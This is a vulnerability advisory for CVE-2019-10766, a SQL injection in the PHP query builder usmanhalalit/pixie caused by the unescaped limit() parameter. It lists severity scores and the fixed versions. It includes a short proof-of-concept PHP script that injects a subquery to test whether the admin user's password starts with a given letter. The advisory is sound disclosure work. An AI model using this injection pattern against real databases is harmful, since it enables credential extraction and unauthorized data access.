SQL Injection Affecting usmanhalalit/pixie package, versions <1.0.3 >=2.0.0, <2.0.2
Snyk CVSS
Attack Complexity
Low
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.21% (59th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-USMANHALALITPIXIE-534879
- published 19 Nov 2019
- disclosed 28 Oct 2019
- credit Snyk Research
Introduced: 28 Oct 2019
CVE-2019-10766 Open this link in a new tabHow to fix?
Upgrade usmanhalalit/pixie to version 1.0.3, 2.0.2 or higher.
Overview
usmanhalalit/pixie is a lightweight, expressive, framework agnostic query builder for PHP.
Affected versions of this package are vulnerable to SQL Injection. The library does not escape the limit() param.
PoC by Snyk Security Team
<?
require 'vendor/autoload.php';
$config = array(
'driver' => 'pgsql',
'host' => '127.0.0.1',
'database' => 'postgres',
'username' => 'postgres',
'password' => ''
);
new \Pixie\Connection('pgsql', $config, 'QB');
$query = QB::table('notes')->limit('(SELECT COUNT(*) FROM users WHERE name=\'admin\' AND password LIKE \'P%\')');
$queryObj = $query->getQuery();
print_r($queryObj->getSql());
echo "\n";
print_r($query->get());